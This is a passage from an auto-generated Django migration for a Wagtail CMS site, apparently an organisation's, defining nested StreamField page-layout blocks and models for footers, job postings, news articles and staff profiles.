wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-right', label='Right column content'))))), ('threecolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-left', label='Left column content')), ('center_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Center column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Right column content'))))), ('tab_index', wagtail.wagtailcore.blocks.StructBlock((('display_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'vertical'), ('horizontal', 'horizontal')])), ('tabsIndexes', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.TextBlock(max_length=25, required=True)), ('display', wagtail.wagtailcore.blocks.TextBlock(max_length=40, required=True))))),)))))), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.CharBlock(required=True)), ('isActive', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False)), ('container', wagtail.wagtailcore.blocks.StreamBlock((('two_column_block', wagtail.wagtailcore.blocks.StructBlock((('left_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('right_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-left', label='Left column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-right', label='Right column content'))))), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='Footer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(default='untitled', max_length=255)),
('content', wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('twocolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('right_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-left', label='Left column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-right', label='Right column content'))))), ('threecolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-left', label='Left column content')), ('center_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(template='common/blocks/image.html')), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Center column content')), ('right_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('embedded_video', wagtail.wagtailembeds.blocks.EmbedBlock()), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), classname='col4', icon='arrow-right', label='Right column content'))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), blank=True, null=True)),
],
options={
'verbose_name_plural': 'Footers',
'verbose_name': 'Footer',
},
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, unique=True)),
('background', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('responsibilities', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('skills', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('notes', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('location', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('benefits', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('applying', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('core_technologies', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('referrals', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('preferred', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('qualifications', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('experience_we_need', wagtail.wagtailcore.fields.RichTextField(blank=True)),
],
options={
'ordering': ['title'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.CreateModel(
name='NewsArticle',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('date', models.DateField(verbose_name='Post date')),
('intro', models.CharField(blank=True, max_length=1000)),
('body', wagtail.wagtailcore.fields.RichTextField(blank=True, help_text='Fill this if the article is from COS')),
('external_link', models.CharField(blank=True, help_text='Fill this if the article is NOT from COS', max_length=255, verbose_name='External Article Link')),
('footer', models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='common.Footer')),
('main_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('custom_url', models.CharField(default='', max_length=256)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='NewsIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('statement', models.CharField(blank=True, max_length=1000)),
('footer', models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='common.Footer')),
('menu_order', models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('middle_name', models.CharField(blank=True, max_length=255, null=True)),
('last_name', models.CharField(max_length=255)),
('bio', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('title', models.CharField(blank=True, max_length=140)),
('position', models.CharField(blank=True, max_length=140)),
('term', models.CharField(blank=True, help_text='Format:YYYY-YYYY', max_length=9)),
('linked_in', models.URLField(blank=True)),
('blog_url', models.URLField(blank=True)),
('osf_profile', models.URLField(blank=True)),
('phone_number', models.CharField(blank=True, help_text='Format:XXX-XXX-XXXX', max_length=12)),
('email_address', models.EmailField(blank=True, max_length=254)),
('favorite_food', models.CharField(blank=True, max_length=140)),
('photo', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'verbose_name_plural': 'People',
'ordering': ['last_name'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.CreateModel(
name='PersonTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_person', to='common.Person')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='common_persontag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='person',
name='tags',
field=taggit.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', through='common.PersonTag', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='person',
name='user',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='custompage',
name='footer',
field=models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='common.Footer'),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tab_index', wagtail.wagtailcore.blocks.StructBlock((('display_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'vertical'), ('horizontal', 'horizontal')])), ('tabsIndexes', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.TextBlock(max_length=25, required=True)), ('display', wagtail.wagtailcore.blocks.TextBlock(max_length=40, required=True))))),)))))), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.CharBlock(required=True)), ('isActive', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False)), ('container', wagtail.wagtailcore.blocks.StreamBlock((('two_column_block', common.blocks.columns.RowBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), 